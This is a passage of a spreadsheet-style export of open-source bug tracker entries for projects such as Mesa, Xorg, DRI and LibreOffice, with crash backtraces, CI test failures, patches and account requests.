#43 0x019bfc1b in nsBaseAppShell::Run (this=0xb36d3560)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/widget/src/xpwidgets/nsBaseAppShell.cpp:181
#44 0x018895f2 in nsAppStartup::Run (this=0xb3578dc0)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/toolkit/components/startup/src/nsAppStartup.cpp:191
#45 0x01111a18 in XRE_main (argc=1 argv=0xbf95a224 aAppData=0xb750e380)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/toolkit/xre/nsAppRunner.cpp:3682
#46 0x080494c2 in main (argc=1 argv=0xbf95a224)
    at /build/buildd/firefox-4.0~b7+nobinonly/build-tree/mozilla/browser/app/nsBrowserApp.cpp:158
(gdb) frame 0
#0  intel_finish_render_texture (ctx=0xa4f18000 att=0xa904b1dc)
    at intel_fbo.c:662
662	   intel_image-&gt;used_as_render_target = GL_FALSE
(gdb) print intel_image
$1 = (struct intel_texture_image *) 0x0</t>
  </si>
  <si>
    <t>DRI-70788</t>
  </si>
  <si>
    <t>igt/kms_cursor_crc/cursor-white-visible-offscreen fails</t>
  </si>
  <si>
    <t>Created attachment 88021
dmesg
System Environment:
--------------------------
Platform:  PNV/ILK/SNB/IVB/HSW
Kernel:	(drm-intel-nightly)aabd627ec77463dc9c064ce2735ef71f48a2ec94
Bug detailed description:
---------------------------
It fails on PNV/ILK/SNB/IVB/HSW with -queued and -nightly kernel and works well on -fixes kernel. It's a new igt case.
output:
Beginning cursor-white-visible-offscreen on crtc 3 connector 7
.................................................Test assertion failure function do_single_test file kms_cursor_crc.c:166:
Failed assertion: igt_crc_equal(&amp;crcs[0] &amp;test_data-&gt;ref_crc)
Subtest cursor-white-visible-offscreen: FAIL
Reproduce steps:
----------------------------
1. ./kms_cursor_crc --run-subtest cursor-white-visible-offscreen</t>
  </si>
  <si>
    <t>DRI-103886</t>
  </si>
  <si>
    <t>[CI] igt@perf_pmu@multi-client-vecs0 - fail - Failed assertion: (double)(val[1]) = (1.0 - (tolerance)) * (double)(slept)</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3377/shard-glkb6/igt@perf_pmu@multi-client-vecs0.html
(perf_pmu:4132) CRITICAL: Test assertion failure function multi_client file perf_pmu.c:650:
(perf_pmu:4132) CRITICAL: Failed assertion: (double)(val[1]) = (1.0 - (tolerance)) * (double)(slept)
(perf_pmu:4132) CRITICAL: 'val[1]' != 'slept' (190889525.000000 not within 5.000000% tolerance of 166780280.000000)
Subtest multi-client-vecs0 failed.
Note this was previously filed on bug 103857. However that bug was fixed for a lot of other tests and machines.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-21804</t>
  </si>
  <si>
    <t>Account Request (gallium/nouveau and xf86-video-nouveau)</t>
  </si>
  <si>
    <t>Created attachment 25978
SSH public key (RSA)
Hi I've been told by Stephane Marchesin and Maarten Maathuis as a reply to the patches I sent to the nouveau mailing list for the nouveau Gallium code to request an account for both mesa (gallium/nouveau) and xf86-video-nouveau so here I am requesting :-) .
name: Christoph Bumiller
email: e0425955@student.tuwien.ac.at
account name: chrisbmr seems ok</t>
  </si>
  <si>
    <t>e0425955</t>
  </si>
  <si>
    <t>DRI-111562</t>
  </si>
  <si>
    <t>[CI][BAT] igt@gem* - fail / dmesg-fail - Failed assertion: !GPU hung</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_6838/fi-tgl-u/igt@gem_close_race@basic-threads.html
Starting subtest: basic-threads
(gem_close_race:1040) igt_aux-CRITICAL: Test assertion failure function sig_abort file ../lib/igt_aux.c:502:
(gem_close_race:1040) igt_aux-CRITICAL: Failed assertion: !GPU hung</t>
  </si>
  <si>
    <t>not set</t>
  </si>
  <si>
    <t>LIBREOFFICE-65140</t>
  </si>
  <si>
    <t>problem with saved .doc file while using Classic Phone Tools</t>
  </si>
  <si>
    <t>Using LO 3.5.6 when saving a file in .doc format and then opening in my fax app Classic Phone Tools the fax app has no problems reading the .doc file and converting for transmission.  After upgrading to LO 4.0 the fax application is no longer able to open/convert the file for transmission.
I've migrated back to LO 3.5.6 then opened the .doc file saved under 4.0 file opens and no problems noted.  Saved the file again by overwriting.  Now when I open the fax app and the noted .doc file the fax app can now once again read/convert the file for transmission.
Appear something has changed in the formating when saving a file using .doc format</t>
  </si>
  <si>
    <t>mickey_sherry</t>
  </si>
  <si>
    <t>XPRINT-2240</t>
  </si>
  <si>
    <t>/etc/init.d/xprint uses /usr/bin/tr the wrong way</t>
  </si>
  <si>
    <t>[Originally reported in various Debian bug reports including Debian bug #258419
and Debian bug #264983]
/etc/init.d/xprint uses /usr/bin/tr to translate font paths into font lists and
backwards using the wrong way - the used [\n] expression is neither correct
nor portable.</t>
  </si>
  <si>
    <t>PYCAIRO-3419</t>
  </si>
  <si>
    <t>test</t>
  </si>
  <si>
    <t>DBUS-14472</t>
  </si>
  <si>
    <t>poll() causes long pauses on OSX</t>
  </si>
  <si>
    <t>Created attachment 14289
don't test for poll on platforms on which it is broken
While better since 10.4 OSX's poll has a dubious history and one of the kde/mac developers has tracked a dbus issue down to OSX's poll implementation.
Changing dbus to use select instead fixes this.</t>
  </si>
  <si>
    <t>PKG-CONFIG-13909</t>
  </si>
  <si>
    <t>pkg.m4: rephrase the comment before PKG_CHECK_EXISTS</t>
  </si>
  <si>
    <t>The comment text was confusing.  I beleive my formulation explains the situation better...</t>
  </si>
  <si>
    <t>kasal</t>
  </si>
  <si>
    <t>DRI-28774</t>
  </si>
  <si>
    <t>RS780: No picture over HDMI</t>
  </si>
  <si>
    <t>This is netbook MSI U230 with RS780 using drm-radeon-testing.
When I connect TV using HDMI I can see it's resolutions in xrandr and even enabling it seems to work fine (1920x1080 is selected my desktop expands) but there is nothing displayed on TV.
I've tried KMS radeon DDX radeon DDX radeonhd. Same result for each.</t>
  </si>
  <si>
    <t>XORG-46474</t>
  </si>
  <si>
    <t>[965gm uxa] GPU hang when running glslideshow for too long</t>
  </si>
  <si>
    <t>Created attachment 57477
extract from syslog
Hey
I have an issue with my Intel GM965 card (on Thinkpad T61 running Debian sid).
Basically when letting my screensaver (which is glsideshow displaying pictures on both LVDS and VGA screen) run for too long the GPU seems to hang.
I experienced it few times when I forgot to close the laptop lid for the night when waking up the displays are black no answer when touching the keyboard but the laptop is still alive and can be accessed by ssh.
There I have the attached logs (dmesg and syslog)
I have debugfs mounted so I can show some debugging information if you tell me what you want.</t>
  </si>
  <si>
    <t>XORG-42211</t>
  </si>
  <si>
    <t>X server crashes since some change around Rearrange the BLT-&gt;RENDER workaround</t>
  </si>
  <si>
    <t>Hi. I've started  to experince X hungs and crashes since some change around 2011-10-17 or 2011-10-16. 
I'm running git driver version in a Slackware64 based system. The problem was tested with the following configuration:
kernels: 3.0 3.1rc4 3.1rc6 3.1rc10
Xorg: 1.10.3
mesa: 7.10.3 and latest git version
drm: latest git version
compiz: 0.9.2 to 0.9.5
The last git version that works ok for me is the one from 2011-10-17 12:41:14 (last change I see in gitk is sna: Fast path common colour conversions). I think (but I can't be 100% sure since crashes are almost random so I can't reproduce it easily) that the next change (Rearrange the BLT-&gt;RENDER workaround from 2011-10-16 16:05:49) is the one that started the problem.
I always compile it with sna enabled. 
Let me know what extra information can I send to help you.</t>
  </si>
  <si>
    <t>zaskar_84</t>
  </si>
  <si>
    <t>XORG-15281</t>
  </si>
  <si>
    <t>X crashes/hangs with EXA</t>
  </si>
  <si>
    <t>With EXA X crashes (desktop with Q965) or hangs (laptop with 965GM) 100% reproduceably with this method:
* Shortcut bound to kwin (KDE 3.5.9) maximise event (in my case Ctrl+Alt+M).
* Open some window press and hold down this shortcut and release after some seconds.
It might take several attempts or it crash/hang without release some point but it happens 100% quite quickly. My xserver isn't compiled with debug info so backtrace isn't very informative. It happens with both with and without DRI.
xorg-server: 1.4.0.90
xf86-video-intel: 2.2.99.902
Platfrom is DragonFly BSD and in case that matters agp inkernel code DragonFly BSD is using is direct port from FreeBSD 7.0.
Backtrace from crashing X on Q965:
(gdb) bt
#0  0x286aabd0 in exaPolylines () from /usr/pkg/lib/xorg/modules//libexa.so
#1  0x0814de94 in ?? ()
#2  0x0807fc17 in ProcPolyLine ()
#3  0x0812f725 in ?? ()
#4  0x0808247f in Dispatch ()
#5  0x0806be6f in main ()</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-29050</t>
  </si>
  <si>
    <t>Personal repository request</t>
  </si>
  <si>
    <t>Hello
I want to request a personal git repository. I am developing on the video-pipe branch of gallium implementing a vdpau backend.
My name is Thomas Balling SÃ¸rensen. Can I have the username tball?
Please let me know if you want more information.</t>
  </si>
  <si>
    <t>XORG-23082</t>
  </si>
  <si>
    <t>[845G] crash!</t>
  </si>
  <si>
    <t>Created attachment 28253
log file. i'm not sure whether it is actually from *this* crashing run though - too many reboots.
i got this one while switching vts but i also had spontaneous crashes and x servers stuck in D state after switching vts - no idea whether these are related.
#0  0xa77b641f in drm_intel_bo_alloc (bufmgr=0x0
    name=0xa78094e4 HW cursors size=20480 alignment=524288)
    at /home/ossi/src/dl/xorg/mesa/drm/libdrm/intel/intel_bufmgr.c:51
#1  0xa77e0066 in i830_allocate_memory_bo (pScrn=0x8a7a4c8
    name=0xa78094e4 HW cursors size=20480 pitch=0 align=524288
    flags= tile_format=TILE_NONE)
    at /home/ossi/src/dl/xorg/driver/xf86-video-intel/src/i830_memory.c:730
#2  0xa77e06b9 in i830_allocate_cursor_buffers (pScrn=0x8a7a4c8)
    at /home/ossi/src/dl/xorg/driver/xf86-video-intel/src/i830_memory.c:1146
#3  0xa77e0c98 in i830_allocate_2d_memory (pScrn=0x8a7a4c8)
    at /home/ossi/src/dl/xorg/driver/xf86-video-intel/src/i830_memory.c:1276
#4  0xa77d8519 in i830_try_memory_allocation (pScrn=0x8a7a4c8)
    at /home/ossi/src/dl/xorg/driver/xf86-video-intel/src/i830_driver.c:2281
#5  0xa77d8658 in i830_memory_init (pScrn=0x8a7a4c8)
    at /home/ossi/src/dl/xorg/driver/xf86-video-intel/src/i830_driver.c:2328
#6  0xa77db87b in I830ScreenInit (scrnIndex=0 pScreen=0x9631068 argc=9
    argv=0xafe5ee54)
    at /home/ossi/src/dl/xorg/driver/xf86-video-intel/src/i830_driver.c:2673
#7  0x0808a2fc in AddScreen (pfnInit=0xa77db4a1  argc=9
    argv=0xafe5ee54) at /home/ossi/src/dl/xorg/xserver/dix/dispatch.c:4048
#8  0x080aa981 in InitOutput (pScreenInfo=0x81a4c18 argc=9 argv=0xafe5ee54)
    at /home/ossi/src/dl/xorg/xserver/hw/xfree86/common/xf86Init.c:1027
#9  0x08066c7a in main (argc=9 argv=0xafe5ee54 envp=0x73726f)
    at /home/ossi/src/dl/xorg/xserver/dix/main.c:201</t>
  </si>
  <si>
    <t>MESA-92304</t>
  </si>
  <si>
    <t>[cts] cts.shaders.negative conformance tests fail</t>
  </si>
  <si>
    <t>New GL Conformance tests fail on all intel platforms:
piglit.es2-cts.shaders.negative.initialize
piglit.es3-cts.shaders.negative.constant_sequence
piglit.es3-cts.shaders.negative.initialize
Note that constant sequence *passes* for es2
Git revision is from master 93161be.  However the tests fail as far back as the 10.6 branch point.</t>
  </si>
  <si>
    <t>DRI-101319</t>
  </si>
  <si>
    <t>Tonga DC + UVD  [drm:fill_plane_attributes [amdgpu]] *ERROR* Unable to reserve buffer</t>
  </si>
  <si>
    <t>R9285 Tonga it seems that on various agd5f DC kernels using
mpv -fs --hwdec=vdpau 
screen is 1920x1080 DVI-D
will sometimes produces logging with a few
[drm:fill_plane_attributes [amdgpu]] *ERROR* Unable to reserve buffer
grepping kernel log shows this is not new + only seems to happen with a DC kernel (I spend more time in non DC kernels and have no instances with those).
First record April 3rd but then it doesn't always happen and I don't always run that test so it could have started earlier. 
With just a few of the errors no bad effects noticed.
Today with current agd5f amd-staging-4.11 I got a display lock with logging below I can't reproduce the lock but can get a few of the messages to show.
Jun  6 17:48:16 ph4 kernel: [drm:fill_plane_attributes [amdgpu]] *ERROR* Unable to reserve buffer
Jun  6 17:48:47 ph4 last message repeated 6136 times
Jun  6 17:49:33 ph4 last message repeated 9208 times
Jun  6 17:49:33 ph4 kernel: sysrq: SysRq : Emergency Sync
Jun  6 17:49:33 ph4 kernel: Emergency Sync complete
Jun  6 17:49:33 ph4 kernel: [drm:fill_plane_attributes [amdgpu]] *ERROR* Unable to reserve buffer
Jun  6 17:49:34 ph4 last message repeated 306 times
Jun  6 17:49:34 ph4 kernel: sysrq: SysRq : Emergency Remount R/O
Jun  6 17:49:34 ph4 kernel: [drm:fill_plane_attributes [amdgpu]] *ERROR* Unable to reserve buffer</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-5861</t>
  </si>
  <si>
    <t>Account request.</t>
  </si>
  <si>
    <t>xorg project.
Account name: warp
Email address: warp@aehallh.com
Real Name: Zephaniah E. Hull.
GPG key ID and fingerprint are:
E65A7801
92ED 94E4 B1E6 3624 226D  5727 4453 008B E65A 7801
An ascii armored gpg public key and a ssh public key should be attached.
Thank you.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-2582</t>
  </si>
  <si>
    <t>xkb cyrillic layout on US and non-US keyboards (Nothern Europe)</t>
  </si>
  <si>
    <t>The existing ru and even ru(phonetic) layouts are inadequate when used on a
Swedish or similar keyboard. Some keys are not available in cyrillic mode
some keys are not used.
I have produced a phonetic layout for Swedish keyboards which is the only
viable solution when you are in Sweden use multiple computers and hence have to
use the original keyboards to write in Russian.
In contrast ru layout does not work properly. Besides the ignorance of the
present extra keys and hence unnecessary abuse of other keys it lacks the
upper half of the symbols provided by se layout neither allows input of
occational Latin and Swedish letters.
The new layout is meant to be used like
setxkbmap -rules xorg -model pc105 -layout seru_SE -option grp:caps_toggle
[-variant nodeadkeysnodeadkeys]
It can probably be improved (say for needs of blind-typing according to russian
typewriter layout) - but it is definitely useful as is used by several users
for several years.
I ask for inclusion of this layout in the distribution (on common terms).</t>
  </si>
  <si>
    <t>pin</t>
  </si>
  <si>
    <t>LIBREOFFICE-82911</t>
  </si>
  <si>
    <t>Libreoffice 4.2.5.2 fails to build with IJG's libjpeg 9a</t>
  </si>
  <si>
    <t>https://bugs.gentoo.org/show_bug.cgi?id=479946
Quoting
[build CXX] vcl/source/filter/jpeg/JpegReader.cxx
/tmp/portage/app-office/libreoffice-4.1.0.4/work/libreoffice-4.1.0.4/vcl/source/filter/jpeg/JpegReader.cxx: In function 'void init_source(j_decompress_ptr)':
/tmp/portage/app-office/libreoffice-4.1.0.4/work/libreoffice-4.1.0.4/vcl/source/filter/jpeg/JpegReader.cxx:74:29: error: invalid conversion from 'sal_Bool {aka unsigned char}' to 'boolean' [-fpermissive]
/tmp/portage/app-office/libreoffice-4.1.0.4/work/libreoffice-4.1.0.4/vcl/source/filter/jpeg/JpegReader.cxx: In function 'boolean fill_input_buffer(j_decompress_ptr)':
/tmp/portage/app-office/libreoffice-4.1.0.4/work/libreoffice-4.1.0.4/vcl/source/filter/jpeg/JpegReader.cxx:122:29: error: invalid conversion from 'sal_Bool {aka unsigned char}' to 'boolean' [-fpermissive]
/tmp/portage/app-office/libreoffice-4.1.0.4/work/libreoffice-4.1.0.4/vcl/source/filter/jpeg/JpegReader.cxx:124:12: error: invalid conversion from 'sal_Bool {aka unsigned char}' to 'boolean' [-fpermissive]
[build CXX] vcl/source/filter/jpeg/JpegWriter.cxx
/tmp/portage/app-office/libreoffice-4.1.0.4/work/libreoffice-4.1.0.4/vcl/source/filter/jpeg/JpegWriter.cxx: In function 'boolean empty_output_buffer(j_compress_ptr)':
/tmp/portage/app-office/libreoffice-4.1.0.4/work/libreoffice-4.1.0.4/vcl/source/filter/jpeg/JpegWriter.cxx:89:12: error: invalid conversion from 'sal_Bool {aka unsigned char}' to 'boolean' [-fpermissive]
And indeed seeing same problem with for example FLTK library:
http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/x11-libs/fltk/files/fltk-1.3.2-jpeg-9a.patch?view=log
And other similar bugs:
https://bugs.gentoo.org/showdependencytree.cgi?id=479818&amp;hide_resolved=0
as libjpeg HOMEPAGE is http://www.ijg.org/ where 9a is current
patch:
http://bugs.gentoo.org/attachment.cgi?id=355256
--- vcl/source/filter/jpeg/JpegReader.cxx
+++ vcl/source/filter/jpeg/JpegReader.cxx
@@ -717 +717 @@
      * but we don't clear the input buffer.
      * This is correct behavior for reading a series of images from one source.
      */
-    source-&gt;start_of_file = sal_True
+    source-&gt;start_of_file = boolean(sal_True)
 }
 long StreamRead( SvStream* pStream void* pBuffer long nBufferSize )
@@ -1199 +1199 @@
     source-&gt;pub.next_input_byte = source-&gt;buffer
     source-&gt;pub.bytes_in_buffer = nbytes
-    source-&gt;start_of_file = sal_False
+    source-&gt;start_of_file = boolean(sal_False)
-    return sal_True
+    return boolean(sal_True)
 }
 extern C void skip_input_data (j_decompress_ptr cinfo long numberOfBytes)
--- vcl/source/filter/jpeg/JpegWriter.cxx
+++ vcl/source/filter/jpeg/JpegWriter.cxx
@@ -867 +867 @@
     destination-&gt;pub.next_output_byte = destination-&gt;buffer
     destination-&gt;pub.free_in_buffer = BUFFER_SIZE
-    return sal_True
+    return boolean(sal_True)
 }
 extern C void term_destination (j_compress_ptr cinfo)</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-21943</t>
  </si>
  <si>
    <t>Email addresses shown anonymously in bug reports</t>
  </si>
  <si>
    <t>I just entered bug 21942 and notice that my email address appears verbatim
when viewing the bug.
Of course this allows bots to scrape my email from it.  Ideally the address
would only be visible to logged in users.  Could they at least be obscured in
some way though?</t>
  </si>
  <si>
    <t>tfogal</t>
  </si>
  <si>
    <t>POPPLER-23472</t>
  </si>
  <si>
    <t>pdftoabw lacks --help (amongst others)</t>
  </si>
  <si>
    <t>Created attachment 28865
common options for pdftoabw
The attached patch fixes command line handling for pdftoabw and implements some common options (e.g. --help) that are already found in other pdftosomething utilities.</t>
  </si>
  <si>
    <t>MESA-50156</t>
  </si>
  <si>
    <t>OBS reports duplicate files in $(LIBDIR)/gbm and $(LIBDIR)/opencl</t>
  </si>
  <si>
    <t>Mesa.i586: E: files-duplicated-waste (Badness: 100) 9704040
Your package contains duplicated files that are not hard- or symlinks. You
should use the %fdupes macro to link the files to one.
Mesa.i586: W: files-duplicate /usr/lib/opencl/pipe_i915.so /usr/lib/gbm/pipe_i915.so
Mesa.i586: W: files-duplicate /usr/lib/opencl/pipe_r300.so /usr/lib/gbm/pipe_r300.so
Mesa.i586: W: files-duplicate /usr/lib/opencl/pipe_nouveau.so /usr/lib/gbm/pipe_nouveau.so
Mesa.i586: W: files-duplicate /usr/lib/opencl/pipe_vmwgfx.so /usr/lib/gbm/pipe_vmwgfx.so
Mesa.i586: W: files-duplicate /usr/lib/gbm/pipe_r600.so /usr/lib/opencl/pipe_r600.so
Mesa.i586: W: files-duplicate /usr/lib/opencl/pipe_swrast.so /usr/lib/gbm/pipe_swrast.so
Instead of fixing it with the %fdupes macro on distribution side it should be fixed upstream (symlinks?).
It wastes on current i586 build ~ 9 1/2 MB (stripped without debuginfo).</t>
  </si>
  <si>
    <t>TELEPATHY-18845</t>
  </si>
  <si>
    <t>Assertion failure in _tp_connection_clean_up_handle_refs</t>
  </si>
  <si>
    <t>_tp_connection_clean_up_handle_refs can be called with g_connection=NULL as a result of a Connection emitting the 'invalidated' signal. See https://bugzilla.redhat.com/attachment.cgi?id=325331 for an Empathy backtrace. This appears to have been caused by a Gabble crash.</t>
  </si>
  <si>
    <t>LIBREOFFICE-44937</t>
  </si>
  <si>
    <t>Fonts rendered incorrectly in presentation SLIDESHOW mode REGRESSION</t>
  </si>
  <si>
    <t>Created attachment 55783
test case odp file
I just noticed in 3.5.0beta3 that the fonts are different in the editor versus the presentation mode (see attachments). I do not like how it looks in presentation mode.</t>
  </si>
  <si>
    <t>vossman77</t>
  </si>
  <si>
    <t>MESA-29652</t>
  </si>
  <si>
    <t>Git commit e62e5b0 breaks Civilization IV (wine)</t>
  </si>
  <si>
    <t>LIBREOFFICE-32142</t>
  </si>
  <si>
    <t>Replace Beta download buttons for stable release</t>
  </si>
  <si>
    <t>I find version is still written as Beta on website. 
[example]
http://www.documentfoundation.org/img/controls/ControlElement_Button_Download_Orange_Linux64_Default.png
http://www.documentfoundation.org/img/controls/ControlElement_Button_Download_Magenta_Windows_Default.png</t>
  </si>
  <si>
    <t>DBUS-3241</t>
  </si>
  <si>
    <t>python: dbus.Dbus._signal_func should implement new matching algorithm</t>
  </si>
  <si>
    <t>If you add a signal receiver using the following code:
sessionBus.add_signal_receiver(dbus_callbackMessageReadingorg.gnome.evolution.mail.dbus.SignalNone/org/gnome/evolution/mail/newmail)
the _signal_func should match signal events the same way as if you had used:
sessionBus.add_signal_receiver(dbus_callbackMessageReadingorg.gnome.evolution.mail.dbus.Signal:1.12/org/gnome/evolution/mail/newmail)
An optional parameter should function as a wildcard therefore the code in
Dbus._signal_func:
if (self._match_rule_to_receivers.has_key(match_rule)):
should be refactored as it doesn't work with wildcards.</t>
  </si>
  <si>
    <t>cpinto</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-24234</t>
  </si>
  <si>
    <t>Add rctrl_rshift_toggle option</t>
  </si>
  <si>
    <t>Please add rctrl_rshift_toggle option to switch layout with Right Ctrl+Shift. This is quite useful combination accroding to:
http://tigro.info/wp/?p=592
http://tigro.info/wp/?p=589
Patch by tigro attached.</t>
  </si>
  <si>
    <t>atorkhov</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7806</t>
  </si>
  <si>
    <t>unable to log into cvs.freedesktop.org</t>
  </si>
  <si>
    <t>I received my account on the Aug 1st.  I tried to log into cvs
for the first time the other night but I keep getting the following error.
  cvs -d :pserver:ext:roan@cvs.freedesktop.org:/cvs/clipart login
  (Logging in to ext:roan@cvs.freedesktop.org)
  CVS password:
  PAM start error: Critical error - immediate abort
  Fatal error aborting.
  cvs [login aborted]: unrecognized auth response from
  cvs.freedesktop.org: pam failed to release authenticator</t>
  </si>
  <si>
    <t>roan</t>
  </si>
  <si>
    <t>LIBREOFFICE-56980</t>
  </si>
  <si>
    <t>EDITING: Custom shape becomes text field or disappears when editing text or color from saved file</t>
  </si>
  <si>
    <t>Steps to reproduce:
In Impress:
Draw a right arrow or a rectangle (perhaps any shape will do).
save as odp.
close.
load the file.
edit the text
stop text editing with [escape] or click onto the side of the object.
The object is turned into a text field now.
Other way:
In Impress:
Draw a right arrow or a rectangle (perhaps any shape will do).
save as odp.
close.
load the file.
change the fill color of the shape.
The shape is gone
bug was not there in 3.5.4.2!</t>
  </si>
  <si>
    <t>DRI-109690</t>
  </si>
  <si>
    <t>[CI][DRMTIP] igt@kms_mmap_write_crc - fail - Assertion `waitpid\(-1 &amp;tmp WNOHANG\) == -1 &amp;&amp; errno == ECHILD' failed.*\n.*Received signal SIGABRT</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_222/fi-icl-y/igt@kms_mmap_write_crc.html
kms_mmap_write_crc: ../lib/igt_core.c:1529: igt_exit: Assertion `waitpid(-1 &amp;tmp WNOHANG) == -1 &amp;&amp; errno == ECHILD' failed.
Received signal SIGABRT.
Stack trace: 
 #0 [fatal_sig_handler+0xd5]
 #1 [killpg+0x40]
 #2 [gsignal+0xc7]
 #3 [abort+0x141]
 #4 [uselocale+0x33a]
 #5 [__assert_fail+0x42]
 #6 [igt_exit+0x22c]
 #7 [igt_skip+0x15f]
 #8 [run_test+0x15c]
 #9 [main+0x10a]
 #10 [__libc_start_main+0xe7]
 #11 [_start+0x2a]</t>
  </si>
  <si>
    <t>XORG-45144</t>
  </si>
  <si>
    <t>xaw3d.pc is missing -DXAW_INTERNATIONALIZATION when compiled with --enable-internationalization</t>
  </si>
  <si>
    <t>libXaw3d-1.6 installs /usr/include/X11/Xaw3d/SimpleP.h only when it's ./configured with --enable-internationalization
and SimpleP.h has #ifdef block for XAW_INTERNATIONALIZATION
Then GV ( http://www.gnu.org/software/gv/ ) has configure.in check for SimpleP.h and it needs this piece of code from it:
#ifdef XAW_INTERNATIONALIZATION
    Boolean     international
#endif
And that check fails because nothing is exporting the -DXAW_INTERNATIONALIZATION flag.
In order to resolve this issue I'd propose the following:
If libXaw3d is ./configured with --enable-internationalization it should add -DXAW_INTERNATIONALIZATION to Cflags: line of xaw3d.pc
Then GV can be ported to use xaw3d.pc to get the flag</t>
  </si>
  <si>
    <t>MESA-42032</t>
  </si>
  <si>
    <t>Commit 29361e14 causes white textures in Civ V under wine</t>
  </si>
  <si>
    <t>Civ V under wine (mostly) works with mesa 7.11 when floating point textures are enabled but with 7.12 git (up to 35600279 Oct 20 checked) the world textures are rendered all white.  I've bisected this to find that the following commit is what broke it:
commit 29361e14df8e5e92df747d52303da2c454e2cacc
Author: Eric Anholt 
Date:   Thu Sep 1 16:43:38 2011 -0700
    i965/vs: Allow copy propagation on GRFs.
    Further reduces instruction count by 4.0% in 40.7% of the vertex
    shaders.
diff --git a/src/mesa/drivers/dri/i965/brw_vec4_copy_propagation.cpp b/src/mesa/drivers/dri/i965/brw_vec4_copy_propagation.cpp
index 7862d78..c46735a 100644
--- a/src/mesa/drivers/dri/i965/brw_vec4_copy_propagation.cpp
+++ b/src/mesa/drivers/dri/i965/brw_vec4_copy_propagation.cpp
@@ -1876 +1877 @@ try_copy_propagation(struct intel_context *intel
    value.swizzle = BRW_SWIZZLE4(s[0] s[1] s[2] s[3])
    if (value.file != UNIFORM &amp;&amp;
+       value.file != GRF &amp;&amp;
        value.file != ATTR)
       return false
@@ -2046 +20510 @@ try_copy_propagation(struct intel_context *intel
    if (intel-&gt;gen &gt;= 6 &amp;&amp; inst-&gt;is_math())
       return false
+   /* Don't report progress if this is a noop. */
+   if (value.equals(&amp;inst-&gt;src[arg]))
+      return false
+
    inst-&gt;src[arg] = value
    return true
 }
@@ -3077 +3127 @@ vec4_visitor::opt_copy_propagation()
                      cur_value[i][j] &amp;&amp;
                      cur_value[i][j]-&gt;file == GRF &amp;&amp;
                      cur_value[i][j]-&gt;reg == inst-&gt;dst.reg &amp;&amp;
-                     cur_value[i][j]-&gt;reg == inst-&gt;dst.reg) {
+                     cur_value[i][j]-&gt;reg_offset == inst-&gt;dst.reg_offset) {
                     cur_value[i][j] = NULL
                  }
               }
The Civ V world textures use floating point buffers I'd guess this is why it's not been picked up yet.  Reverting 29361e14df8e5e92df747d52303da2c454e2cacc on git resolves this problem.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-18819</t>
  </si>
  <si>
    <t>Add ralt_switch to default Greek layout</t>
  </si>
  <si>
    <t>Created attachment 20700
Added level3(ralt_switch) to default layout
Currently the default Greek layout is missing ralt_switch.</t>
  </si>
  <si>
    <t>MESA-28033</t>
  </si>
  <si>
    <t>[r300 r300g] World of Warcraft login screen is blocky with RV350</t>
  </si>
  <si>
    <t>Created attachment 35513
Screenshot of the World of Warcraft login page
The login screen for World of Warcraft contains a snow scape. However some of the snow looks as if it's been misrendered as blocks.
This bug happens both with classic Mesa and gallium. The card is an AGP Radeon 9550 (RV350) Linux 2.6.33.3 KMS xf86-xorg-drv from git.</t>
  </si>
  <si>
    <t>MESA-32285</t>
  </si>
  <si>
    <t>Check OpenGL and OpenGL ES2.0 renderer info in one process</t>
  </si>
  <si>
    <t>Created attachment 40977
test case for get GL and GLES2 renderer in one process
Currently I am doing some experiments with mesa to check the renderer info of underlying OpenGL and OpenGL ES2.0 drivers to decide which driver to use at runtime. With my code attached the renderer info for GLES2 can be got successfully and although the EGL and GLES2 libraries are unloaded before creating the GLX context glGetString(GL_RENDERER) for OpenGL still returns NULL. After enable MESA_DEBUG I found the error message GL User Error: calling GL function without a rendering context and many warnings as Mesa warning: failed to remap ..... I also changed the sequence for GL and GLES2 but got similar results. If do separately both renderer info can be got successfully.
And with the commit 16ee7a55ae269612263468195f2af998cb9ef695 the problem is still there.</t>
  </si>
  <si>
    <t>TELEPATHY-14335</t>
  </si>
  <si>
    <t>AIM accounts auto-away themselves</t>
  </si>
  <si>
    <t>02:58              elb | resiak: my AIM account seems to go away when my status is green ball on the 
          tablet sometimes
09:15           resiak | elb: hmm perhaps there's some auto-away defaulting i need to disable
09:17           resiak | elb: (in libpurple that is)
15:18              elb | resiak: possibly -- I have the tablet set to never away and it doesn't go away 
          for XMPP -- but AIM goes away and only comes back from away if I click the status ball adn click 
          'on'</t>
  </si>
  <si>
    <t>XORG-15046</t>
  </si>
  <si>
    <t>Created attachment 15166
0001-Compile-warning-fixes.patch
Move some declarations and don't declare an extra variable with the
same name to fix warnings about mixed declarations and code.
  With this patch the driver compiles with no warnings when using
very verbose gcc options.</t>
  </si>
  <si>
    <t>LIBREOFFICE-60784</t>
  </si>
  <si>
    <t>double short key</t>
  </si>
  <si>
    <t>Created attachment 74744
in the german version hotkey double ALT+E in version 3.6 ALT+Ã– view image in the attachment
in the german version hotkey double ALT+E in version 3.6 ALT+Ã– view image in the attachment</t>
  </si>
  <si>
    <t>khvm</t>
  </si>
  <si>
    <t>LIBREOFFICE-79870</t>
  </si>
  <si>
    <t>Could not able to open a saved file</t>
  </si>
  <si>
    <t>Created attachment 100791
Error Message Screen shot
I couldn't able to oepn a saved Libre spreadsheet file. While opening the file it is showing a error message that Read-Error.
Format error discovered in the file in sub-document content.xml at 228272(rowcol).. I attached the erroe message screenshot . This is a important file kindly advise me to rectify the file. Thanks in advance.</t>
  </si>
  <si>
    <t>livingtone.s</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-87164</t>
  </si>
  <si>
    <t>Remove files from bug 66457</t>
  </si>
  <si>
